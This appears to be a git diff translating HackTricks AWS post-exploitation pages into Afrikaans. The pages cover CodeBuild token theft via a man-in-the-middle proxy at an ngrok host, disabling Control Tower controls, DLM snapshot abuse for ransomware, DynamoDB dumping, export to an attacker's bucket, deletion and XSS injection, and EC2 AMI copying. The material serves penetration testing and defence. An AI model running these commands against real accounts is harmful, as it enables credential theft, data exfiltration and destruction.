+host="127.0.0.1",
+port=4444,
+protocols=[protocol.HTTP],
+middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
+certificate_authority = crypto.CertificateAuthority()
 )
 mitm.run()
 ```
-
-- Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port:
+- Laastens, klik op **Bou die projek**, die **bewyse** sal in **duidelike teks** (base64) na die mitm-poort gestuur word:
 
 <figure><img src="../../../../images/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-### ~~Via HTTP protocol~~
+### ~~Via HTTP-protokol~~
 
-> [!TIP] > **This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)**
+> [!TIP] > **Hierdie kwesbaarheid is op 'n stadium in die week van die 20ste Februarie 2023 deur AWS reggestel (ek dink op Vrydag). So 'n aanvaller kan dit nie meer misbruik nie :)**
 
-An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**.
+'n Aanvaller met **verhoogde regte in 'n CodeBuild kan die Github/Bitbucket-token** wat geconfigureer is, lek of as regte via OAuth geconfigureer is, die **tydelike OAuth-token wat gebruik word om toegang tot die kode te verkry**.
 
-- An attacker could add the environment variables **http_proxy** and **https_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`).
+- 'n Aanvaller kan die omgewingsveranderlikes **http_proxy** en **https_proxy** aan die CodeBuild-projek voeg wat na sy masjien wys (byvoorbeeld `http://5.tcp.eu.ngrok.io:14972`).
 
 <figure><img src="../../../../images/image (232).png" alt=""><figcaption></figcaption></figure>
 
 <figure><img src="../../../../images/image (213).png" alt=""><figcaption></figcaption></figure>
 
-- Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions`
-- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy)
-
+- Verander dan die URL van die github-repo om HTTP in plaas van HTTPS te gebruik, byvoorbeeld: `http://github.com/carlospolop-forks/TestActions`
+- Voer dan die basiese voorbeeld van [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) uit in die poort wat deur die proxy-veranderlikes (http_proxy en https_proxy) aangedui word.
 ```python
 from mitm import MITM, protocol, middleware, crypto
 
 mitm = MITM(
-    host="0.0.0.0",
-    port=4444,
-    protocols=[protocol.HTTP],
-    middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
-    certificate_authority = crypto.CertificateAuthority()
+host="0.0.0.0",
+port=4444,
+protocols=[protocol.HTTP],
+middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
+certificate_authority = crypto.CertificateAuthority()
 )
 mitm.run()
 ```
-
-- Next, click on **Build the project** or start the build from command line:
-
+- Volgende, klik op **Bou die projek** of begin die bou vanaf die opdraglyn:
 ```sh
 aws codebuild start-build --project-name <proj-name>
 ```
-
-- Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port:
+- Uiteindelik sal die **credentials** in **duidelike teks** (base64) na die mitm-poort gestuur word:
 
 <figure><img src="../../../../images/image (159).png" alt=""><figcaption></figcaption></figure>
 
 > [!WARNING]
-> Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly.
+> Nou sal 'n aanvaller in staat wees om die token van sy masjien te gebruik, al die regte wat dit het op te lys en (mis)bruik makliker as om die CodeBuild-diens direk te gebruik.
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
index f1c6fb394..374c51179 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
@@ -8,17 +8,11 @@
 ../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md
 {{#endref}}
 
-### Enable / Disable Controls
-
-To further exploit an account, you might need to disable/enable Control Tower controls:
+### Aktiveer / Deaktiveer Beheer
 
+Om 'n rekening verder te benut, mag jy nodig hê om Control Tower-beheer te deaktiveer/aktiver:
 ```bash
 aws controltower disable-control --control-identifier <arn_control_id> --target-identifier <arn_account>
 aws controltower enable-control --control-identifier <arn_control_id> --target-identifier <arn_account>
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
index baa309e53..199bc31e4 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
@@ -6,94 +6,86 @@
 
 ### `EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy`
 
-A ransomware attack can be executed by encrypting as many EBS volumes as possible and then erasing the current EC2 instances, EBS volumes, and snapshots. To automate this malicious activity, one can employ Amazon DLM, encrypting the snapshots with a KMS key from another AWS account and transferring the encrypted snapshots to a different account. Alternatively, they might transfer snapshots without encryption to an account they manage and then encrypt them there. Although it's not straightforward to encrypt existing EBS volumes or snapshots directly, it's possible to do so by creating a new volume or snapshot.
+'n Ransomware-aanval kan uitgevoer word deur soveel EBS-volumes as moontlik te enkripteer en dan die huidige EC2-instances, EBS-volumes en snapshots te verwyder. Om hierdie kwaadwillige aktiwiteit te outomatiseer, kan 'n mens Amazon DLM gebruik, die snapshots te enkripteer met 'n KMS-sleutel van 'n ander AWS-rekening en die geënkripteerde snapshots na 'n ander rekening oor te dra. Alternatiewelik kan hulle snapshots sonder enkripsie na 'n rekening wat hulle bestuur oorplaas en dit dan daar enkripteer. Alhoewel dit nie reguit is om bestaande EBS-volumes of snapshots direk te enkripteer nie, is dit moontlik om dit te doen deur 'n nuwe volume of snapshot te skep.
 
-Firstly, one will use a command to gather information on volumes, such as instance ID, volume ID, encryption status, attachment status, and volume type.
+Eerstens sal 'n mens 'n opdrag gebruik om inligting oor volumes te versamel, soos instance ID, volume ID, enkripsiestatus, aanhegselsstatus, en volumetipe.
 
 `aws ec2 describe-volumes`
 
-Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.
-
+Tweedens sal 'n mens die lewensiklusbeleid skep. Hierdie opdrag gebruik die DLM API om 'n lewensiklusbeleid op te stel wat outomaties daaglikse snapshots van spesifieke volumes op 'n aangewese tyd neem. Dit pas ook spesifieke etikette op die snapshots toe en kopieer etikette van die volumes na die snapshots. Die policyDetails.json-lêer sluit die besonderhede van die lewensiklusbeleid in, soos teiketikette, skedule, die ARN van die opsionele KMS-sleutel vir enkripsie, en die teikrekening vir snapshotdeling, wat in die slagoffer se CloudTrail-logs aangeteken sal word.
 ```bash
 aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
 ```
-
-A template for the policy document can be seen here:
-
+'n Sjabloon vir die beleidsdokument kan hier gesien word:
 ```bash
 {
-  "PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
-  "ResourceTypes": [
-    "VOLUME"
-  ],
-  "TargetTags": [
-    {
-      "Key": "ExampleKey",
-      "Value": "ExampleValue"
-    }
-  ],
-  "Schedules": [
-    {
-      "Name": "DailySnapshots",
-      "CopyTags": true,
-      "TagsToAdd": [
-        {
-          "Key": "SnapshotCreator",
-          "Value": "DLM"
-        }
-      ],
-      "VariableTags": [
-        {
-          "Key": "CostCenter",
-          "Value": "Finance"
-        }
-      ],
-      "CreateRule": {
-        "Interval": 24,
-        "IntervalUnit": "HOURS",
-        "Times": [
-          "03:00"
-        ]
-      },
-      "RetainRule": {
-        "Count": 14
-      },
-      "FastRestoreRule": {
-        "Count": 2,
-        "Interval": 12,
-        "IntervalUnit": "HOURS"
-      },
-      "CrossRegionCopyRules": [
-        {
-          "TargetRegion": "us-west-2",
-          "Encrypted": true,
-          "CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
-          "CopyTags": true,
-          "RetainRule": {
-            "Interval": 1,
-            "IntervalUnit": "DAYS"
-          }
-        }
-      ],
-      "ShareRules": [
-        {
-          "TargetAccounts": [
-            "123456789012"
-          ],
-          "UnshareInterval": 30,
-          "UnshareIntervalUnit": "DAYS"
-        }
-      ]
-    }
-  ],
-  "Parameters": {
-    "ExcludeBootVolume": false
-  }
+"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
+"ResourceTypes": [
+"VOLUME"
+],
+"TargetTags": [
+{
+"Key": "ExampleKey",
+"Value": "ExampleValue"
+}
+],
+"Schedules": [
+{
+"Name": "DailySnapshots",
+"CopyTags": true,
+"TagsToAdd": [
+{
+"Key": "SnapshotCreator",
+"Value": "DLM"
+}
+],
+"VariableTags": [
+{
+"Key": "CostCenter",
+"Value": "Finance"
+}
+],
+"CreateRule": {
+"Interval": 24,
+"IntervalUnit": "HOURS",
+"Times": [
+"03:00"
+]
+},
+"RetainRule": {
+"Count": 14
+},
+"FastRestoreRule": {
+"Count": 2,
+"Interval": 12,
+"IntervalUnit": "HOURS"
+},
+"CrossRegionCopyRules": [
+{
+"TargetRegion": "us-west-2",
+"Encrypted": true,
+"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
+"CopyTags": true,
+"RetainRule": {
+"Interval": 1,
+"IntervalUnit": "DAYS"
+}
+}
+],
+"ShareRules": [
+{
+"TargetAccounts": [
+"123456789012"
+],
+"UnshareInterval": 30,
+"UnshareIntervalUnit": "DAYS"
+}
+]
+}
+],
+"Parameters": {
+"ExcludeBootVolume": false
+}
 }
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
index d63689d9e..ac5655aa9 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## DynamoDB
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-dynamodb-enum.md
@@ -12,342 +12,292 @@ For more information check:
 
 ### `dynamodb:BatchGetItem`
 
-An attacker with this permissions will be able to **get items from tables by the primary key** (you cannot just ask for all the data of the table). This means that you need to know the primary keys (you can get this by getting the table metadata (`describe-table`).
+'n Aanvaller met hierdie toestemmings sal in staat wees om **items uit tabelle te kry deur die primêre sleutel** (jy kan nie net vir al die data van die tabel vra nie). Dit beteken dat jy die primêre sleutels moet ken (jy kan dit kry deur die tabel metadata te verkry (`describe-table`).
 
 {{#tabs }}
 {{#tab name="json file" }}
-
 ```bash
 aws dynamodb batch-get-item --request-items file:///tmp/a.json
 
 // With a.json
 {
-    "ProductCatalog" : { // This is the table name
-        "Keys": [
-            {
-            "Id" : { // Primary keys name
-                "N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
-            }
-            }
-        ]
-    }
+"ProductCatalog" : { // This is the table name
+"Keys": [
+{
+"Id" : { // Primary keys name
+"N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
+}
+}
+]
+}
 }
 ```
-
 {{#endtab }}
 
 {{#tab name="inline" }}
-
 ```bash
 aws dynamodb batch-get-item \
-    --request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
-    --region <region>
+--request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
+--region <region>
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Potensiële Impak:** Indirekte privesc deur sensitiewe inligting in die tabel te lokaliseer
 
 ### `dynamodb:GetItem`
 
-**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve:
-
+**Soortgelyk aan die vorige toestemmings** laat hierdie een 'n potensiële aanvaller toe om waardes van net 1 tabel te lees gegewe die primêre sleutel van die inskrywing om te verkry:
 ```json
 aws dynamodb get-item --table-name ProductCatalog --key  file:///tmp/a.json
 
 // With a.json
 {
 "Id" : {
-    "N": "205"
+"N": "205"
 }
 }
 ```
-
-With this permission it's also possible to use the **`transact-get-items`** method like:
-
+Met hierdie toestemming is dit ook moontlik om die **`transact-get-items`** metode te gebruik soos:
 ```json
 aws dynamodb transact-get-items \
-    --transact-items file:///tmp/a.json
+--transact-items file:///tmp/a.json
 
 // With a.json
 [
-    {
-        "Get": {
-            "Key": {
-                "Id": {"N": "205"}
-            },
-            "TableName": "ProductCatalog"
-        }
-    }
+{
+"Get": {
+"Key": {
+"Id": {"N": "205"}
+},
+"TableName": "ProductCatalog"
+}
+}
 ]
 ```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Potensiële Impak:** Indirekte privesc deur sensitiewe inligting in die tabel te lokaliseer
 
 ### `dynamodb:Query`
 
-**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows to use a [subset of comparisons](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), but the only comparison allowed with the primary key (that must appear) is "EQ", so you cannot use a comparison to get the whole DB in a request.
+**Soos die vorige toestemmings** laat hierdie een 'n potensiële aanvaller toe om waardes van net 1 tabel te lees gegewe die primêre sleutel van die inskrywing om te verkry. Dit laat toe om 'n [substel van vergelykings](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html) te gebruik, maar die enigste vergelyking wat toegelaat word met die primêre sleutel (wat moet verskyn) is "EQ", so jy kan nie 'n vergelyking gebruik om die hele DB in 'n versoek te verkry nie.
 
 {{#tabs }}
 {{#tab name="json file" }}
-
 ```bash
 aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json
 
- // With a.json
- {
+// With a.json
+{
 "Id" : {
-    "ComparisonOperator":"EQ",
-    "AttributeValueList": [ {"N": "205"} ]
-    }
+"ComparisonOperator":"EQ",
+"AttributeValueList": [ {"N": "205"} ]
+}
 }
 ```
-
 {{#endtab }}
 
 {{#tab name="inline" }}
-
 ```bash
 aws dynamodb query \
-    --table-name TargetTable \
-    --key-condition-expression "AttributeName = :value" \
-    --expression-attribute-values '{":value":{"S":"TargetValue"}}' \
-    --region <region>
+--table-name TargetTable \
+--key-condition-expression "AttributeName = :value" \
+--expression-attribute-values '{":value":{"S":"TargetValue"}}' \
+--region <region>
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Potensiële Impak:** Indirekte privesc deur sensitiewe inligting in die tabel te lokaliseer
 
 ### `dynamodb:Scan`
 
-You can use this permission to **dump the entire table easily**.
-
+Jy kan hierdie toestemming gebruik om **die hele tabel maklik te dump**.
 ```bash
 aws dynamodb scan --table-name <t_name> #Get data inside the table
 ```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Potensiële Impak:** Indirekte privesc deur sensitiewe inligting in die tabel te lokaliseer
 
 ### `dynamodb:PartiQLSelect`
 
-You can use this permission to **dump the entire table easily**.
-
+Jy kan hierdie toestemming gebruik om **die hele tabel maklik te dump**.
 ```bash
 aws dynamodb execute-statement \
-    --statement "SELECT * FROM ProductCatalog"
+--statement "SELECT * FROM ProductCatalog"
 ```
-
-This permission also allow to perform `batch-execute-statement` like:
-
+Hierdie toestemming laat ook toe om `batch-execute-statement` uit te voer soos:
 ```bash
 aws dynamodb batch-execute-statement \
-    --statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
+--statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
 ```
+maar jy moet die primêre sleutel met 'n waarde spesifiseer, so dit is nie so nuttig nie.
 
-but you need to specify the primary key with a value, so it isn't that useful.
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Potensiële Impak:** Indirekte privesc deur sensitiewe inligting in die tabel te lokaliseer
 
 ### `dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)`
 
-This permission will allow an attacker to **export the whole table to a S3 bucket** of his election:
-
+Hierdie toestemming sal 'n aanvaller toelaat om die **hele tabel na 'n S3-bucket** van sy keuse te **eksporteer:**
 ```bash
 aws dynamodb export-table-to-point-in-time \
-    --table-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable \
-    --s3-bucket <attacker_s3_bucket> \
-    --s3-prefix <optional_prefix> \
-    --export-time <point_in_time> \
-    --region <region>
+--table-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable \
+--s3-bucket <attacker_s3_bucket> \
+--s3-prefix <optional_prefix> \
+--export-time <point_in_time> \
+--region <region>
 ```
-
-Note that for this to work the table needs to have point-in-time-recovery enabled, you can check if the table has it with:
-
+Let wel, vir dit om te werk moet die tabel punt-in-tyd-herstel geaktiveer wees, jy kan nagaan of die tabel dit het met:
 ```bash
 aws dynamodb describe-continuous-backups \
-  --table-name <tablename>
+--table-name <tablename>
 ```
-
-If it isn't enabled, you will need to **enable it** and for that you need the **`dynamodb:ExportTableToPointInTime`** permission:
-
+As dit nie geaktiveer is nie, sal jy dit moet **aktiveer** en daarvoor het jy die **`dynamodb:ExportTableToPointInTime`** toestemming nodig:
 ```bash
 aws dynamodb update-continuous-backups \
-    --table-name <value> \
-    --point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
+--table-name <value> \
+--point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
 ```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Potensiële Impak:** Indirekte privesc deur sensitiewe inligting in die tabel te lokaliseer
 
 ### `dynamodb:CreateTable`, `dynamodb:RestoreTableFromBackup`, (`dynamodb:CreateBackup)`
 
-With these permissions, an attacker would be able to **create a new table from a backup** (or even create a backup to then restore it in a different table). Then, with the necessary permissions, he would be able to check **information** from the backups that c**ould not be any more in the production** table.
-
+Met hierdie toestemmings sou 'n aanvaller in staat wees om **nuwe tabel uit 'n rugsteun te skep** (of selfs 'n rugsteun te skep om dit dan in 'n ander tabel te herstel). Dan, met die nodige toestemmings, sou hy in staat wees om **inligting** van die rugsteun te kontroleer wat **nie meer in die produksie** tabel kon wees nie.
 ```bash
 aws dynamodb restore-table-from-backup \
-    --backup-arn <source-backup-arn> \
-    --target-table-name <new-table-name> \
-    --region <region>
+--backup-arn <source-backup-arn> \
+--target-table-name <new-table-name> \
+--region <region>
 ```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table backup
+**Potensiële Impak:** Indirekte privesc deur sensitiewe inligting in die tabel rugsteun te lokaliseer
 
 ### `dynamodb:PutItem`
 
-This permission allows users to add a **new item to the table or replace an existing item** with a new item. If an item with the same primary key already exists, the **entire item will be replaced** with the new item. If the primary key does not exist, a new item with the specified primary key will be **created**.
+Hierdie toestemming laat gebruikers toe om 'n **nuwe item aan die tabel toe te voeg of 'n bestaande item met 'n nuwe item te vervang**. As 'n item met dieselfde primêre sleutel reeds bestaan, sal die **hele item vervang word** met die nuwe item. As die primêre sleutel nie bestaan nie, sal 'n nuwe item met die gespesifiseerde primêre sleutel **gecreëer** word.
 
 {{#tabs }}
-{{#tab name="XSS Example" }}
-
+{{#tab name="XSS Voorbeeld" }}
 ```bash
 ## Create new item with XSS payload
 aws dynamodb put-item --table <table_name> --item file://add.json
 ### With add.json:
 {
-   "Id": {
-      "S": "1000"
-   },
-   "Name": {
-      "S":  "Marc"
-   },
-   "Description": {
-       "S": "<script>alert(1)</script>"
-   }
+"Id": {
+"S": "1000"
+},
+"Name": {
+"S":  "Marc"
+},
+"Description": {
+"S": "<script>alert(1)</script>"
+}
 }
 ```
-
 {{#endtab }}
 
-{{#tab name="AI Example" }}
-
+{{#tab name="AI Voorbeeld" }}
 ```bash
 aws dynamodb put-item \
-    --table-name ExampleTable \
-    --item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \
-    --region <region>
+--table-name ExampleTable \
+--item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \
+--region <region>
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
+**Potensiële Impak:** Exploitatie van verdere kwesbaarhede/omseilings deur in staat te wees om data in 'n DynamoDB-tabel toe te voeg/wysig
 
 ### `dynamodb:UpdateItem`
 
-This permission allows users to **modify the existing attributes of an item or add new attributes to an item**. It does **not replace** the entire item; it only updates the specified attributes. If the primary key does not exist in the table, the operation will **create a new item** with the specified primary key and set the attributes specified in the update expression.
+Hierdie toestemming laat gebruikers toe om **die bestaande eienskappe van 'n item te wysig of nuwe eienskappe aan 'n item toe te voeg**. Dit **vervang nie** die hele item nie; dit werk slegs die gespesifiseerde eienskappe by. As die primêre sleutel nie in die tabel bestaan nie, sal die operasie **'n nuwe item skep** met die gespesifiseerde primêre sleutel en die eienskappe wat in die opdateringuitdrukking gespesifiseer is, stel. 
 
 {{#tabs }}
 {{#tab name="XSS Example" }}
-
 ```bash
 ## Update item with XSS payload
 aws dynamodb update-item --table <table_name> \
-    --key file://key.json --update-expression "SET Description = :value" \
-    --expression-attribute-values file://val.json
+--key file://key.json --update-expression "SET Description = :value" \
+--expression-attribute-values file://val.json
 ### With key.json:
 {
-    "Id": {
-        "S": "1000"
-    }
+"Id": {
+"S": "1000"
+}
 }
 ### and val.json
 {
-    ":value": {
-        "S": "<script>alert(1)</script>"
-    }
+":value": {
+"S": "<script>alert(1)</script>"
+}
 }
 ```
-
 {{#endtab }}
 
-{{#tab name="AI Example" }}
-
+{{#tab name="AI Voorbeeld" }}
 ```bash
 aws dynamodb update-item \
-    --table-name ExampleTable \
-    --key '{"Id": {"S": "1"}}' \
-    --update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \
-    --expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \
-    --region <region>
+--table-name ExampleTable \
+--key '{"Id": {"S": "1"}}' \
+--update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \
+--expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \
+--region <region>
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
+**Potensiële Impak:** Exploitatie van verdere kwesbaarhede/omseilings deur in staat te wees om data in 'n DynamoDB-tabel by te voeg/wysig
 
 ### `dynamodb:DeleteTable`
 
-An attacker with this permission can **delete a DynamoDB table, causing data loss**.
-
+'n Aanvaller met hierdie toestemming kan **'n DynamoDB-tabel verwyder, wat dataverlies veroorsaak**.
 ```bash
 aws dynamodb delete-table \
-    --table-name TargetTable \
-    --region <region>
+--table-name TargetTable \
+--region <region>
 ```
-
-**Potential impact**: Data loss and disruption of services relying on the deleted table.
+**Potensiële impak**: Gegevensverlies en onderbreking van dienste wat op die verwyderde tabel staatmaak.
 
 ### `dynamodb:DeleteBackup`
 
-An attacker with this permission can **delete a DynamoDB backup, potentially causing data loss in case of a disaster recovery scenario**.
-
+'n Aanvaller met hierdie toestemming kan **'n DynamoDB-rugsteun verwyder, wat moontlik tot gegevensverlies kan lei in die geval van 'n rampherstel-scenario**.
 ```bash
 aws dynamodb delete-backup \
-    --backup-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable/backup/BACKUP_ID \
-    --region <region>
+--backup-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable/backup/BACKUP_ID \
+--region <region>
 ```
-
-**Potential impact**: Data loss and inability to recover from a backup during a disaster recovery scenario.
+**Potensiële impak**: Gegevensverlies en onvermoë om van 'n rugsteun te herstel tydens 'n rampherstel-scenario.
 
 ### `dynamodb:StreamSpecification`, `dynamodb:UpdateTable`, `dynamodb:DescribeStream`, `dynamodb:GetShardIterator`, `dynamodb:GetRecords`
 
 > [!NOTE]
-> TODO: Test if this actually works
+> TODO: Toets of dit werklik werk
 
-An attacker with these permissions can **enable a stream on a DynamoDB table, update the table to begin streaming changes, and then access the stream to monitor changes to the table in real-time**. This allows the attacker to monitor and exfiltrate data changes, potentially leading to data leakage.
-
-1. Enable a stream on a DynamoDB table:
+'n Aanvaller met hierdie toestemmings kan **'n stroom op 'n DynamoDB-tabel aktiveer, die tabel opdateer om veranderinge te begin stroom, en dan toegang tot die stroom verkry om veranderinge aan die tabel in werklike tyd te monitor**. Dit stel die aanvaller in staat om data veranderinge te monitor en te exfiltreer, wat moontlik kan lei tot data lek.
 
+1. Aktiveer 'n stroom op 'n DynamoDB-tabel:
 ```bash
 bashCopy codeaws dynamodb update-table \
-    --table-name TargetTable \
-    --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \
-    --region <region>
+--table-name TargetTable \
+--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \
+--region <region>
 ```
-
-2. Describe the stream to obtain the ARN and other details:
-
+2. Beskryf die stroom om die ARN en ander besonderhede te verkry:
 ```bash
 bashCopy codeaws dynamodb describe-stream \
-    --table-name TargetTable \
-    --region <region>
+--table-name TargetTable \
+--region <region>
 ```
-
-3. Get the shard iterator using the stream ARN:
-
+3. Kry die shard iterator met behulp van die stroom ARN:
 ```bash
 bashCopy codeaws dynamodbstreams get-shard-iterator \
-    --stream-arn <stream_arn> \
-    --shard-id <shard_id> \
-    --shard-iterator-type LATEST \
-    --region <region>
+--stream-arn <stream_arn> \
+--shard-id <shard_id> \
+--shard-iterator-type LATEST \
+--region <region>
 ```
-
-4. Use the shard iterator to access and exfiltrate data from the stream:
-
+4. Gebruik die shard iterator om toegang te verkry tot en data uit die stroom te exfiltreer:
 ```bash
 bashCopy codeaws dynamodbstreams get-records \
-    --shard-iterator <shard_iterator> \
-    --region <region>
+--shard-iterator <shard_iterator> \
+--region <region>
 ```
-
-**Potential impact**: Real-time monitoring and data leakage of the DynamoDB table's changes.
+**Potensiële impak**: Regte-tyd monitering en data lekkasie van die DynamoDB tabel se veranderinge.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md
index 9ae6a0a4f..21f02432f 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md
@@ -4,7 +4,7 @@
 
 ## EC2 & VPC
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
@@ -12,10 +12,10 @@ For more information check:
 
 ### **Malicious VPC Mirror -** `ec2:DescribeInstances`, `ec2:RunInstances`, `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress`, `ec2:CreateTrafficMirrorTarget`, `ec2:CreateTrafficMirrorSession`, `ec2:CreateTrafficMirrorFilter`, `ec2:CreateTrafficMirrorFilterRule`
 
-VPC traffic mirroring **duplicates inbound and outbound traffic for EC2 instances within a VPC** without the need to install anything on the instances themselves. This duplicated traffic would commonly be sent to something like a network intrusion detection system (IDS) for analysis and monitoring.\
-An attacker could abuse this to capture all the traffic and obtain sensitive information from it:
+VPC-verkeer spieëling **dubbel die inkomende en uitgaande verkeer vir EC2-instances binne 'n VPC** sonder die behoefte om enigiets op die instances self te installeer. Hierdie gedupliseerde verkeer sou gewoonlik na iets soos 'n netwerk indringing opsporingstelsel (IDS) gestuur word vir analise en monitering.\
+'n Aanvaller kan dit misbruik om al die verkeer te vang en sensitiewe inligting daaruit te verkry:
 
-For more information check this page:
+Vir meer inligting, kyk hierdie bladsy:
 
 {{#ref}}
 aws-malicious-vpc-mirror.md
@@ -23,8 +23,7 @@ aws-malicious-vpc-mirror.md
 
 ### Copy Running Instance
 
-Instances usually contain some kind of sensitive information. There are different ways to get inside (check [EC2 privilege escalation tricks](../../aws-privilege-escalation/aws-ec2-privesc.md)). However, another way to check what it contains is to **create an AMI and run a new instance (even in your own account) from it**:
-
+Instances bevat gewoonlik 'n soort sensitiewe inligting. Daar is verskillende maniere om binne te kom (kyk [EC2 privilege escalation tricks](../../aws-privilege-escalation/aws-ec2-privesc.md)). egter, 'n ander manier om te kyk wat dit bevat, is om **'n AMI te skep en 'n nuwe instance (selfs in jou eie rekening) daaruit te laat loop**:
 ```shell
 # List instances
 aws ec2 describe-images
@@ -48,11 +47,10 @@ aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "
 aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
 aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
 ```
-
